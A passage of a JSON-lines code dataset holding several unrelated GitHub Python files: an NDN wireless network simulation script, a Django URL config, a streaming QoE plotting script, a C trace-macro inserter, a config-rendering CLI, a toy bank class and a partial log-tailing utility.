c0.start()\n for pAp in net.aps:\n pAp.start([c0])\n\n # if '-v' not in sys.argv:\n # for pAp in net.aps:\n # info('Setting for ap=%s' % pAp.name)\n # pAp.cmd('ovs-ofctl add-flow ' + pAp.name + ' \"priority=0,arp,in_port=1,'\n # 'actions=output:in_port,normal\"')\n # pAp.cmd('ovs-ofctl add-flow ' + pAp.name + ' \"priority=0,icmp,in_port=1,'\n # 'actions=output:in_port,normal\"')\n # pAp.cmd('ovs-ofctl add-flow ' + pAp.name + ' \"priority=0,udp,in_port=1,'\n # 'actions=output:in_port,normal\"')\n # pAp.cmd('ovs-ofctl add-flow ' + pAp.name + ' \"priority=0,tcp,in_port=1,'\n # 'actions=output:in_port,normal\"')\n\n info(\"*** Starting NFD processes\\n\")\n lstNfdProcs = list()\n for pStation in net.stations:\n nfdProc = pStation.popen(\"nfd --config /usr/local/etc/ndn/nfd.conf.sample\")\n lstNfdProcs.append(nfdProc)\n\n info('Creating and registering faces\\n')\n for pStation in net.stations:\n for pStation2 in net.stations:\n if (pStation != pStation2):\n pStation.cmd(\"nfdc face create udp://\" + pStation2.IP())\n pStation.cmd('nfdc route add %s udp://%s' % (interestFilterForHost(pStation2.name), pStation2.IP()))\n\n info(\"*** Running CLI\\n\")\n CLI(net)\n\n info(\"*** Stopping NFD\\n\")\n for proc in lstNfdProcs:\n proc.kill()\n\n info(\"*** Stopping network\\n\")\n net.stop()\n\ndef processTopo(topoFile):\n config = configparser.ConfigParser(delimiters=' ')\n config.read(topoFile)\n topo = MyTopology()\n\n items = config.items('stations')\n debug(\"Stations\")\n for item in items:\n debug(item[0].split(':'))\n name = item[0].split(':')[0]\n params = {}\n for param in item[1].split(' '):\n if (param == \"_\"):\n continue\n key = param.split('=')[0]\n value = param.split('=')[1]\n if key in ['range']:\n value = int(value)\n params[key] = value\n topo.addStation(name, **params)\n\n try:\n debug(\"APs\")\n items = config.items('accessPoints')\n for item in items:\n debug(item[0].split(':'))\n name = item[0].split(':')[0]\n ap_params = {}\n for param in item[1].split(' '):\n if (param == \"_\"):\n continue\n key = param.split('=')[0]\n value = param.split('=')[1]\n if key in ['range']:\n value = int(value)\n ap_params[key] = value\n topo.addAccessPoint(name, **ap_params)\n except configparser.NoSectionError:\n debug(\"APs are optional\")\n pass\n\n items = config.items('links')\n debug(\"Links\")\n for item in items:\n link = item[0].split(':')\n debug(link)\n params = {}\n for param in item[1].split(' '):\n if param == \"_\":\n continue\n key = param.split('=')[0]\n value = param.split('=')[1]\n if key in ['bw', 'jitter', 'max_queue_size']:\n value = int(value)\n if key == 'loss':\n value = float(value)\n params[key] = value\n\n topo.addLink(link[0], link[1], **params)\n\n return topo\n\ndef interestFilterForHost(strHost):\n return '/%s' % strHost\n\ndef findNodeByName(strName, lstNodes):\n for pNode in lstNodes:\n if (str(pNode) == strName):\n return pNode\n return None\n\nif __name__ == '__main__':\n setLogLevel('info')\n topology()\n","repo_name":"andredxc/ICNSimulations","sub_path":"src/deprecated/complex-wifi.py","file_name":"complex-wifi.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23562442126","text":"from django.urls import path\r\nfrom . 
import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='LandingPage'),\r\n path('about-us', views.aboutUs, name='About-Us'),\r\n path('testimonials', views.testimonials, name='Testimonials'),\r\n path('registration', views.register, name='Register'),\r\n\r\n path('driver', views.driverPage, name='driverPage'),\r\n path('driverIndex', views.driverIndex, name='driverIndex'),\r\n\r\n path('customer', views.customerPage, name='customerPage'),\r\n path('customerIndex', views.customerIndex, name='customerIndex'),\r\n\r\n path('farmer', views.farmerPage, name=\"farmerPage\"),\r\n path('farmerIndex', views.farmerIndex, name=\"farmerIndex\"),\r\n path('farmerInventory', views.farmerInventory, name=\"farmerInventory\"),\r\n\r\n path('profile', views.profilePage, name='ProfilePage'),\r\n path('cart', views.cartPage, name='CartPage'),\r\n path('product', views.productPage, name='ProductPage'),\r\n path('account', views.accountPage, name='AccountPage'),\r\n path('orders', views.ordersPage, name='orderPage'),\r\n path('requests', views.requestsPage, name='requestPage'),\r\n]\r\n","repo_name":"NilanchalaPanda/DEBUG-THUGS---FRESHWHEELS","sub_path":"login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"817601742","text":"import argparse\nimport math\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nimport shutil\nimport pandas as pd\nimport seaborn as sns\n\nsns.set()\nsns.set_context(\"talk\")\n\nNUM_BINS = 100\npath = '../Data/Video_Info/Pensieve_Info/PenieveVideo_video_info'\n\nvideo_mappings = {}\nvideo_mappings['300'] = '320x180x30_vmaf_score' \nvideo_mappings['750'] = '640x360x30_vmaf_score'\nvideo_mappings['1200'] = '768x432x30_vmaf_score'\nvideo_mappings['1850'] = '1024x576x30_vmaf_score'\nvideo_mappings['2850'] = '1280x720x30_vmaf_score'\nvideo_mappings['4300'] = '1280x720x60_vmaf_score'\n\n\nmetric_list = [\"reward_vmaf\", \"reward_br\", \"rebuf\", \"br_avg\", \"vmaf_avg\", \"switching_vmaf\", \"switching_br\"]\n#MINERVA\nrebuf_penalty = 25\nswitching_penalty = 2.5\n\n\nsegment_lenght = 4.0\n\ndef load_csv():\n video_info = pd.read_csv(path)\n return video_info\n\npensieve_video_csv = load_csv()\n\ndef get_qoe(abr, trace):\n logdir = os.path.join(args.result_dir, abr + \"-\" + trace, \"result\")\n logfile = os.path.join(logdir, abr + \"_rewards_0.log\")\n \n reward_vmaf = 0\n reward_bitrate = 0\n total_rebuffering = 0.0\n vmaf_avg = 0.0\n vmaf_switching_avg = 0.0\n bitrate_avg = 0.0\n bitrate_switching_avg = 0.0\n\n with open(logfile, \"r\") as fin:\n reward_lines = fin.readlines()\n \n if (len(reward_lines) != args.video_chunks):\n if len(reward_lines) < args.video_chunks:\n to_clean.append(logfile)\n print(\"{} has {} chunks instead of {}\".format(logfile, len(reward_lines), args.video_chunks))\n print(\"Skip, please\")\n return None, None, None, None, None, None, None\n\n for i, r_line in enumerate(reward_lines):\n data = r_line.split()\n if i == 0:\n br = int(data[1])\n br_previous = br\n vmaf_previous = pensieve_video_csv.loc[i, video_mappings[str(br)]]\n else: # skip first\n br = int(data[1])\n bitrate_avg += br\n bitrate_switching_avg += abs(br - br_previous)\n reward_bitrate += float(data[-1])\n\n total_rebuffering += float(data[3])\n \n vmaf_current = pensieve_video_csv.loc[i, video_mappings[str(br)]]\n vmaf_avg += vmaf_current\n vmaf_switching_avg += abs(vmaf_current - vmaf_previous)\n\n reward_vmaf += (float(vmaf_current) - \n 
rebuf_penalty*(float(data[3])) - \n switching_penalty*(abs(vmaf_current - vmaf_previous)))\n \n vmaf_previous = vmaf_current\n br_previous = br\n\n return reward_vmaf,\\\n reward_bitrate,\\\n total_rebuffering,\\\n bitrate_switching_avg/(segment_lenght*args.video_chunks),\\\n vmaf_switching_avg/(segment_lenght*args.video_chunks),\\\n vmaf_avg/(segment_lenght*args.video_chunks),\\\n bitrate_avg/args.video_chunks\n\n#\n#def get_qoe(abr, trace):\n# logdir = os.path.join(args.result_dir, abr + \"-\" + trace, \"result\")\n# logfile = os.path.join(logdir, abr + \"_rewards_0.log\")\n# \n# reward = 0\n# \n#\n# with open(logfile, \"r\") as fin:\n# reward_lines = fin.readlines()\n# \n# if (len(reward_lines) != args.video_chunks):\n# if len(reward_lines) < args.video_chunks:\n# to_clean.append(logfile)\n# print(\"{} has {} chunks instead of {}\".format(logfile, len(reward_lines), args.video_chunks))\n# print(\"Skip, please\")\n# return None\n#\n# for i, r_line in enumerate(reward_lines):\n# if i > 0: # skip first\n# reward += float(r_line.split()[-1])\n# \n# return reward\n\ndef get_qoes(abrs_list, traces_list):\n \n global_results = {}\n for abr in abrs_list:\n global_results[abr] = []\n global_results[abr] = {}\n global_results[abr]['reward_vmaf'] = []\n global_results[abr]['reward_br'] = []\n global_results[abr]['rebuf'] = []\n global_results[abr]['switching_br'] = []\n global_results[abr]['switching_vmaf'] = []\n global_results[abr]['vmaf_avg'] = []\n global_results[abr]['br_avg'] = []\n\n for trace in traces_list:\n reward_vmaf, reward_br, rebuf, switching_br, switching_vmaf, vmaf_avg, br_avg = get_qoe(abr, trace)\n if reward_vmaf is not None:\n global_results[abr]['reward_vmaf'].append(reward_vmaf)\n global_results[abr]['reward_br'].append(reward_br)\n global_results[abr]['rebuf'].append(rebuf)\n global_results[abr]['switching_br'].append(switching_br)\n global_results[abr]['switching_vmaf'].append(switching_vmaf)\n global_results[abr]['vmaf_avg'].append(vmaf_avg)\n global_results[abr]['br_avg'].append(br_avg)\n\n return global_results\n\ndef get_qoes_partial(abrs_list, traces_list):\n \n total_experiments_expected = len(args.abrs) * len(args.traces)\n \n experiments_executed_so_far = 0\n partial_results = {}\n \n for abr in abrs_list:\n \n partial_results[abr] = {}\n partial_results[abr]['reward_vmaf'] = []\n partial_results[abr]['reward_br'] = []\n partial_results[abr]['rebuf'] = []\n partial_results[abr]['switching_br'] = []\n partial_results[abr]['switching_vmaf'] = []\n partial_results[abr]['vmaf_avg'] = []\n partial_results[abr]['br_avg'] = []\n\n\n for trace in traces_list:\n \n logdir = os.path.join(args.result_dir, abr + \"-\" + trace, \"result\")\n if os.path.exists(logdir):\n reward_vmaf, reward_br, rebuf, switching_br, switching_vmaf, vmaf_avg, br_avg = get_qoe(abr, trace)\n if reward_vmaf is not None:\n partial_results[abr]['reward_vmaf'].append(reward_vmaf)\n partial_results[abr]['reward_br'].append(reward_br)\n partial_results[abr]['rebuf'].append(rebuf)\n partial_results[abr]['switching_br'].append(switching_br)\n partial_results[abr]['switching_vmaf'].append(switching_vmaf)\n partial_results[abr]['vmaf_avg'].append(vmaf_avg)\n partial_results[abr]['br_avg'].append(br_avg)\n\n experiments_executed_so_far += 1\n if partial_results[abr] == []:\n del partial_results[abr]\n\n print(\"Experiment executed: {}/{}\".format(experiments_executed_so_far, total_experiments_expected))\n return partial_results\n\n\ndef plot_cdf(results, reward_key):\n \n fig = plt.figure(figsize=(16.0, 
10.0))\n ax = fig.add_subplot(111)\n \n def average_of_the_best():\n avg_best = -1000000000000\n abr_best = ''\n for scheme in results.keys():\n avg_tmp = np.mean(results[scheme][reward_key])\n if avg_best < avg_tmp:\n avg_best = avg_tmp\n abr_best = scheme\n \n print(\"Best provider in average is {} with {}\".format(abr_best, avg_best))\n\n return abs(avg_best)\n\n schemes = []\n\n norm = average_of_the_best()\n\n markers = ['.', ',', 'o', 'v', '^', '>', '<', 's', 'x', 'D', 'd', '*', '_', '']\n\n for i, scheme in enumerate(results.keys()):\n values = [float(i)/norm for i in results[scheme][reward_key]]\n values, base = np.histogram(values, bins=len(values))\n cumulative = np.cumsum(values)\n cumulative = [float(i) / len(values) * 100 for i in cumulative]\n marker_index = i % len(markers)\n ax.plot(base[:-1], cumulative, linewidth=3, marker=markers[marker_index], markevery=2, markersize=15)\n schemes.append(scheme)\n\n ax.legend(schemes, loc=2)\n ax.set_xlim(-1.0, 1.8)\n plt.ylabel('CDF')\n plt.xlabel('total reward')\n fig.savefig(os.path.join(args.store_dir, 'cdf_{}.png'.format(reward_key)))\n\n\ndef plot_bar(results, metric):\n \n results_metric_avg = {}\n\n for scheme in results.keys():\n results_metric_avg[scheme] = np.mean(results[scheme][metric])\n\n fig = plt.figure(figsize=(16.0, 10.0))\n ax = fig.add_subplot(111)\n \n y_pos = np.arange(len(results_metric_avg.keys()))\n ax.bar(y_pos, results_metric_avg.values())\n ax.set_xticks(y_pos)\n ax.set_xticklabels(results_metric_avg.keys())\n fig.savefig(os.path.join(args.store_dir, 'bar_{}.png'.format(metric)))\n\n\ndef clean():\n timestamps = []\n for c in to_clean:\n timestamp_creation = os.path.getmtime(c)\n timestamps.append(timestamp_creation)\n print(\"File {} was created at {}\".format(c, timestamp_creation))\n \n timestamps.sort()\n if not args.include_last and len(timestamps) >= 1:\n print(\"Skipping file created at {}: might be still running\".format(timestamps[-1]))\n del timestamps[-1]\n\n \n removing = []\n\n for t in timestamps:\n for c in to_clean:\n if os.path.getmtime(c) == t:\n print(\"Removing {}\".format(os.path.dirname(os.path.dirname(c))))\n removing.append(os.path.dirname(os.path.dirname(c)))\n for r in removing:\n shutil.rmtree(r)\ndef main():\n \n \n # parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('result_dir', help='result directory', type=str)\n parser.add_argument('store_dir', help='result directory', type=str)\n parser.add_argument('video_chunks', help='result directory', type=int)\n parser.add_argument(\"--abrs\", nargs=\"+\", help='ABR list')\n parser.add_argument(\"--traces\", nargs=\"+\", help='Traces list')\n parser.add_argument('--partial', action=\"store_true\", help=\"get the partial results\")\n parser.add_argument('--allow_cleaning', action=\"store_true\", help=\"if enabled, cleans the experiments that failed, a part of the most recent one (might still be running\")\n parser.add_argument('--include_last', action=\"store_true\", help=\"if enabled, also the last is getting cleaned\")\n\n # args need to be global for simplicity\n global args\n args = parser.parse_args()\n \n global to_clean\n to_clean = []\n\n if not os.path.exists(args.store_dir):\n os.makedirs(args.store_dir)\n\n if args.partial:\n res = get_qoes_partial(args.abrs, args.traces)\n else:\n res = get_qoes(args.abrs, args.traces)\n \n for metric in metric_list:\n if \"reward\" in metric:\n plot_cdf(res, metric)\n plot_bar(res, metric)\n \n if args.allow_cleaning:\n print(\"Executing cleaning\")\n clean()\n\nif 
__name__ == \"__main__\":\n main()\n","repo_name":"magruener/reconstructing-proprietary-video-streaming-algorithms","sub_path":"DashExperiments/make_plot.py","file_name":"make_plot.py","file_ext":"py","file_size_in_byte":10625,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"11161821887","text":"import re\nfrom os import listdir\nfrom os.path import isfile, join\n\nfile_start = \"#define FSTART(filename) {FILE* fp = fopen((filename),\\\"a\\\"); if (fp != NULL){fprintf(fp,\\\"\\\\nEntering \" \\\n \": [%s] at [%s:%d]\\\",__func__,__FILE__, __LINE__); fclose(fp);}} \"\nfile_end = \"#define FEND(filename) {FILE* fp = fopen((filename),\\\"a\\\"); if (fp != NULL){fprintf(fp,\\\"\\\\nLeaving : [\" \\\n \"%s] at [%s:%d]\\\",__func__,__FILE__, __LINE__); fclose(fp);}} \"\n\nfs = \"FSTART();\"\nfe = \"FEND();\"\n\n# fun pat\nPATold = r'[a-zA-Z_]+[0-9]*[\\s]+[a-zA-Z_]+[0-9]*[:]*[a-zA-Z_]+[0-9]*[\\s]*[\\(]+[a-zA-Z0-9_\\*&\\s\\.\\,]*[\\)][\\s]*[{]'\nPAT = r'[a-zA-Z_]+[0-9]*[\\s]+[a-zA-Z_]+[0-9]*[:]*[a-zA-Z_]+[0-9]*[\\s]*[\\(]+[a-zA-Z0-9_\\*&\\s\\.\\,]*[\\)][\\s]*[{]'\n\n\ndef processDir(path):\n onlyfiles = [f for f in listdir(path) if isfile(join(path, f))]\n for f in onlyfiles:\n if f.lower().endswith(\".c\") or f.lower().endswith(\".cpp\"):\n processFile(f)\n pass\n\n\ndef removePattern(text, patt):\n index = text.find(patt)\n if index == -1:\n return text\n else:\n return text[:index]\n\n\ndef processFile(filePath):\n print(\"Processing : \" + filePath)\n lines = []\n singleLine = \" \"\n debugList = []\n with open(filePath) as file:\n lines = file.readlines()\n # lines = [line.rstrip() for line in lines]\n for line in lines:\n singleLine = singleLine + line\n\n debugList.append(file_start)\n debugList.append(file_end)\n nf = file_start + \"\\n\" + file_end\n\n match = re.search(PAT, singleLine)\n temp = singleLine\n while match is not None:\n print('Start Index:', match.start())\n print('End Index:', match.end())\n print(temp[match.start():match.end()])\n piece = temp[match.start():match.end()]\n if piece.strip().startswith(\"#\") or piece.strip().startswith(\"//\") or piece.strip().startswith(\"/*\"):\n nf = nf + temp[:match.end()]\n temp = temp[match.end():]\n else:\n #nf = nf + temp[:match.end()] + \"\\n\" + fs + \"\\n\"\n bop = 1\n bi = match.end()\n while bop != 0:\n if temp[bi] == '{':\n bop = bop + 1\n elif temp[bi] == '}':\n bop = bop - 1\n bi = bi + 1\n\n body = temp[match.end():bi]\n nf = nf + temp[:match.end()] + \"\\n\" + fs + \"\\n\"\n voidRet = body.find(\"return\")\n while body.find(\"return \") != -1:\n si = body.find(\"return \")\n nf = nf + body[:si] + \"\\n\" + fe + \"\\n\" + \"return \"\n body = body[si + 7:]\n if voidRet == -1:\n print(body)\n body = body.rstrip()\n xlen = len(body)\n if body.endswith('}'):\n body = body[:xlen-1] + \"\\n\" + fe + \"\\n}\"\n nf = nf + body\n else:\n nf = nf + body\n #nf = nf + temp[match.end():(bi - 2)] + \"\\n\" + fe +\"\\n}\"\n temp = temp[bi:]\n match = re.search(PAT, temp)\n nf = nf + temp\n\n with open(filePath + \"_debug\", 'w') as f:\n f.write(nf)\n\n # with open(filePath+\"_debug\", 'w') as f:\n # for item in debugList:\n # f.write(\"%s\\n\" % item)\n\n\nprocessDir(\"./\")\n","repo_name":"likhilkt/py_scrap","sub_path":"trace_gen_v2.py","file_name":"trace_gen_v2.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16940044106","text":"import argparse\n\nimport sys\nfrom 
bakerman.handler import discoverRepoHandler\nfrom bakerman.handler import discoverRenderHandler\nfrom bakerman.handler import discoverManifestHandler\nfrom bakerman.handler import discoverLookupHandler\nfrom bakerman.helper import lookupVariables\nfrom bakerman.helper import getLogger\n\nCOMMIT_MESSAGE = \"\"\"\nBakerman committed following changes:\n%s\n\"\"\"\n\n\ndef parseArguments() -> argparse.Namespace:\n \"\"\"\n Defines and parses the CLI provided arguments.\n\n Returns:\n - NameSpace object containing all arguments\n \"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Automatically regenerate config files to include the latest artifact versions.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"--repo\",\n type=str,\n dest=\"repo\",\n default=None,\n help=\"The URL of the repository to update. If omitted --workdir is expected to already contain a repo.\",\n )\n parser.add_argument(\n \"--manifest\",\n type=str,\n dest=\"manifest\",\n default=\"bakerman.manifest\",\n help=\"The Bakerman manifest containing the package and container versions.\",\n )\n parser.add_argument(\n \"--template\",\n type=str,\n dest=\"template\",\n default=\"bakerman.template\",\n help=\"The template to render.\",\n )\n parser.add_argument(\n \"--workdir\",\n type=str,\n dest=\"workdir\",\n required=True,\n help=\"The local workdir containing the repository\",\n )\n parser.add_argument(\n \"--target\",\n type=str,\n dest=\"target\",\n default=\"bakerman.target\",\n help=\"The path of the target build file which --template will render into.\",\n )\n parser.add_argument(\n \"--no-repo\",\n dest=\"no_repo\",\n default=False,\n action=\"store_true\",\n help=\"If defined, no repo commit & push is done.\",\n )\n\n return parser.parse_args()\n\n\ndef start(args: argparse.Namespace) -> None:\n \"\"\"\n Main Bakerman logic.\n Performs\n\n Raises:\n Exception: An unhandled error happened and should be made clear to the\n user as this indicates a bug for which a report should be made.\n \"\"\"\n\n logger = getLogger(\"main\")\n commit_message = []\n try:\n\n # Get the repository handler which is responsible for doing all the\n # CVS interaction in which the container build and Bakerman files are\n # stored.\n repo_cls = discoverRepoHandler(workdir=args.workdir, uri=args.repo)\n repo = repo_cls(uri=args.repo, workdir=args.workdir)\n\n # Get the render handler which is responsible for rendering the\n # `--template` file using the arguments the manifest handler comes up\n # with\n render_cls = discoverRenderHandler(args.workdir, args.template)\n target_file = render_cls(args.workdir, args.template, args.target)\n\n # Get the manifest handler which is responsible for reading and\n # writing the manifest file and returning a Python data structure.\n manifest_cls = discoverManifestHandler(args.workdir, args.manifest)\n manifest = manifest_cls(args.workdir, args.manifest)\n manifest_content = manifest.read()\n\n # Get all the different lookup handlers needed to discover the latest\n # values requested in the manifest file. 
lookupVariables() is just a\n        # convenience function which takes care of this.\n        variables = lookupVariables(discoverLookupHandler, manifest_content)\n\n        # Update the content of the manifest for each variable we have found.\n        # And write it\n        for key, value in variables.items():\n            if manifest.updateVariable(key, value):\n                message = f\"Variable '{key}' has been updated to '{value}'.\"\n                commit_message.append(\"- \" + message)\n                logger.info(message)\n            else:\n                logger.debug(f\"Variable '{key}' has not changed.\")\n\n        # Write the manifest to disk\n        manifest_updated = manifest.write()\n\n        # Render the template file using the newly found version numbers.\n        if manifest_updated:\n            logger.info(\n                f\"The manifest has been updated. Regenerating target file '{args.workdir}/{args.target}'\"\n            )\n            target_file.render(variables)\n\n            if args.no_repo:\n                logger.info(\"--no-repo set, not committing nor pushing any changes.\")\n            else:\n                logger.info(\"Committing changes and pushing repo.\")\n                repo.commit(COMMIT_MESSAGE % \"\\n\".join(commit_message))\n                repo.push()\n        else:\n            logger.info(\n                f\"The manifest has not been updated. Not regenerating target file '{args.workdir}/{args.target}'\"\n            )\n\n    except NotImplementedError as err:\n        logger.error(\"Fatal Error. Reason: %s\" % (err))\n        sys.exit(1)\n\n    except Exception as err:\n        print(\n            \"An unhandled error occurred. Please submit a bug report including the manifest, template and CLI command used. Reason: %s\"\n            % (err)\n        )\n        raise\n\n\ndef main():\n\n    arguments = parseArguments()\n    start(arguments)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"smetj/bakerman","sub_path":"bakerman/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"12432187750","text":"from conta import Conta\nimport random\nfrom datetime import datetime\n\nclass Bank():\n    def __init__(self,):\n        self.__contas = {}\n        self.__agencias = []\n        self.today = datetime.today().date()\n\n\n    \n    @property\n    def agencias(self):\n        return self.__agencias\n    \n    @property\n    def contas(self,):\n        return self.__contas\n    \n    def is_same_day(self):\n        if datetime.today().date() == self.today:\n            return True\n        else:\n            self.today = datetime.today().date()\n            return False\n    \n    def gerar_numero_agencia(self,):\n        # Define the range of branch numbers you want to simulate\n        numero_minimo = 1000\n        numero_maximo = 9999\n\n        # Generate a random branch number within the defined range\n        numero_agencia = random.randint(numero_minimo, numero_maximo)\n        if numero_agencia not in self.__agencias:\n            self.__agencias.append(numero_agencia)\n        return numero_agencia\n\n    def criaConta(self, numero:int,agencia:int):\n        if f\"{numero}\" not in self.__contas:\n            if agencia in self.__agencias:\n                self.__contas[f\"{numero}\"]= Conta(numero,agencia)\n                print(self.__contas[f\"{numero}\"])\n        else:\n            print(\"numero de conta já existente\")\n\n    def realiza_deposito(self,numeroConta:int,valor:float):\n        if valor > 0:\n            contaEnvio = self.__contas[f'{numeroConta}']\n            contaEnvio.recebe_deposito(valor)\n            contaEnvio.adiciona_transacao(f'{self.today}deposito de {valor}; Saldo: {contaEnvio.saldo}')\n            return f\"deposito de {valor} para a conta:{numeroConta}; Saldo atual de: {contaEnvio.saldo}\"\n        else:\n            return \"Valor de depósito inválido\"\n    \n\n    def verifica_extrato(self,numeroConta:int):\n        contaExtrato = self.__contas[f\"{numeroConta}\"]\n        return contaExtrato.transacoes\n    \n    def 
realiza_saque(self,numeroConta:int,valor:float):\n        if f\"{numeroConta}\" in self.__contas:\n            contaSacada = self.__contas[f\"{numeroConta}\"]\n            if valor <= 500 and valor <= contaSacada.saldo and contaSacada.saqueHoje <3:\n                if self.is_same_day():\n                    contaSacada.saqueHoje +=1\n                else:\n                    contaSacada.saqueHoje = 0\n                contaSacada.realiza_saque(valor)\n                contaSacada.adiciona_transacao(f'{self.today} Saque realizado de {valor}; Saldo: {contaSacada.saldo}')\n                return f'Saque realizado de {valor}; Saldo: {contaSacada.saldo}' \n            else:\n                print(\"valor de saque inválido\")\n        else:\n            print(f\"{numeroConta} inexistente.\")","repo_name":"danmtsu/Ifood-data-science","sub_path":"JPDBank/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"11881340230","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Print an unseen tailing part of a log file\"\"\"\n\n\nimport argparse\nimport logging\nimport os\nimport shutil\nimport sys\nimport tempfile\n\nVERSION = (0, 9, 2)\n__version__ = '.'.join(map(str, VERSION))\nDEFAULT_POSITION = (0, b'')\nLOG_FORMAT = '%(levelname)s: %(message)s'\nCACHE_DELIMITER = '##'\nEOL = b'\\n'\nCACHE_FILENAME = '.cutthelog'\nHELPS = {\n    'logfile': 'path of a file to print',\n    'cache_file': 'path of the cache file',\n    'cache_delimiter': 'delimiter of cache record (by default \"{}\")'.format(CACHE_DELIMITER),\n    'verbose': 'enable verbose mode',\n    'version': 'print utility version and exit',\n}\nNOT_FOUND = 'File \"%s\" not found'\nNO_PERMISSION = 'No permission to %s \"%s\"'\n\n\nclass CutthelogError(Exception):\n    \"\"\"General module exception\"\"\"\n\n\nclass CutthelogCacheError(CutthelogError):\n    \"\"\"Error of cache interaction\"\"\"\n\n\nclass CutTheLog:\n    \"\"\"A class to read a single file from a cached position\"\"\"\n\n    def __init__(self, path, offset=None, last_line=None):\n        \"\"\"Object initialization\n\n        Parameters\n        ----------\n        path : |str|\n            An absolute or relative path of a file to read\n        offset : |int|, optional\n            The file position of the last line read on the last interaction\n        last_line : |bytes|, optional\n            The value of the last line read on the last interaction\n        \"\"\"\n        self.path = os.path.normpath(os.path.abspath(path))\n        self.offset = None\n        self.last_line = None\n        self.fhandler = None\n        self.set_position(offset, last_line)\n\n    def get_position(self):\n        \"\"\"Return position stored in the object\"\"\"\n        return (self.offset, self.last_line)\n\n    def set_position(self, offset=None, last_line=None):\n        \"\"\"Set internal object position or reset it without arguments\"\"\"\n        self.offset = offset or DEFAULT_POSITION[0]\n        self.last_line = last_line or DEFAULT_POSITION[1]\n\n    def __call__(self, offset=None, last_line=None):\n        \"\"\"Allow setting the position inside a with statement, like\n\n        Parameters\n        ----------\n        offset : |int|, optional\n            The file position of the last line read on the last interaction\n        last_line : |bytes|, optional\n            The value of the last line read on the last interaction\n\n        Examples\n        --------\n        >>> cutthelog = CutTheLog('/var/log/kern.log')\n        >>> with cutthelog(offset=2605148, last_line=b'Feb 20 11:22:57 ...') as line_iter:\n        ...     for line in line_iter:\n        ...         
print(line.decode(), end='')\n        \"\"\"\n        self.set_position(offset, last_line)\n        return self\n\n    def __enter__(self):\n        \"\"\"Open the file and check whether the position is correct\n\n        If the check fails, the position resets to the start of the file.\n        Return iterator over unseen byte lines\"\"\"\n        fhandler = open(self.path, 'rb')\n        offset, last_line = self.get_position()\n        try:\n            fhandler.seek(offset)\n            line = next(fhandler)\n            if line.rstrip(EOL) != last_line.rstrip(EOL):\n                raise StopIteration\n        except (IOError, StopIteration):\n            fhandler.seek(0)\n            self.set_position()\n        self.fhandler = fhandler\n        return iter(self)\n\n    def is_file_opened(self):\n        return self.fhandler is not None and not self.fhandler.closed\n\n    def __exit__(self, exc_type, exc_value, traceback):\n        \"\"\"Close the file\"\"\"\n        if self.is_file_opened():\n            self.fhandler.close()\n\n    def __iter__(self):\n        \"\"\"Iterator over lines of the file\n\n        It's intended only for use inside the __enter__ method\n        when the file is opened\"\"\"\n        if not self.is_file_opened():\n            return\n        offset_change = len(self.last_line)\n        for line in self.fhandler:\n            self.offset += offset_change\n            self.last_line = line\n            yield line\n            offset_change = len(line)\n\n    def get_eof_position(self):\n        \"\"\"Return offset and value of the last line without reading the whole file\n\n        Raises\n        ------\n        EnvironmentError\n            On failed file opening or reading\n        \"\"\"\n        chunk_size = 512\n        last_line_chunks = []\n        with open(self.path, 'rb') as fhandler:\n            fhandler.seek(0, os.SEEK_END)\n            offset = fhandler.tell()\n            while offset > 0:\n                step = min(chunk_size, offset)\n                offset -= step\n                fhandler.seek(offset, os.SEEK_SET)\n                chunk = fhandler.read(step)\n                start, end = (None, None) if last_line_chunks else (0, step - 1)\n                last_line_pos = chunk.rfind(EOL, start, end) + 1\n                if last_line_pos > 0:\n                    offset += last_line_pos\n                    last_line_chunks.append(chunk[last_line_pos:])\n                    break\n                last_line_chunks.append(chunk)\n        return (offset, b''.join(reversed(last_line_chunks)))\n\n    def _get_cache_props(self, delimiter):\n        delimiter = delimiter or CACHE_DELIMITER\n        return (self.path.encode() + delimiter.encode(), delimiter.encode())\n\n    def set_position_from_cache(self, cache_file, delimiter=None):\n        \"\"\"Set the internal position from the cache file\n\n        If there is no record for the file in the cache, the object position doesn't change\n        A cache record of a file looks like\n        <file_path><delimiter><offset><delimiter><last_line>\n\n        There is no need to parse every cache line so we search only the required one\n        and don't use the csv module\n\n        Parameters\n        ----------\n        cache_file : |str|\n            The path of the cache file\n        delimiter : |str|, optional\n            The delimiter used by cache records\n\n        Raises\n        ------\n        `CutthelogCacheError`\n            On failed cache reading or malformed cache record for the file\n        \"\"\"\n        file_prefix, delimiter = self._get_cache_props(delimiter)\n        try:\n            with open(cache_file, 'rb') as fhandler:\n                line_iter = ((index, line) for index, line in enumerate(fhandler)\n                             if line.startswith(file_prefix))\n                index, line = next(line_iter, (None, None))\n                if line is not None:\n                    splitted_line = line.split(delimiter, 2)\n                    if len(splitted_line) == 3:\n                        try:\n                            self.set_position(int(splitted_line[1]), splitted_line[2])\n                        except ValueError:\n                            msg = 'Bad offset {} in line #{}'.format(splitted_line[1], index)\n                            raise CutthelogCacheError(msg)\n                    else:\n                        msg = 'Malformed cache line #{}: {}'.format(index, line.rstrip())\n                        raise CutthelogCacheError(msg)\n        except EnvironmentError as err:\n            raise CutthelogCacheError('Failed to read cache: ' + str(err))\n\n    def save_to_cache(self, 
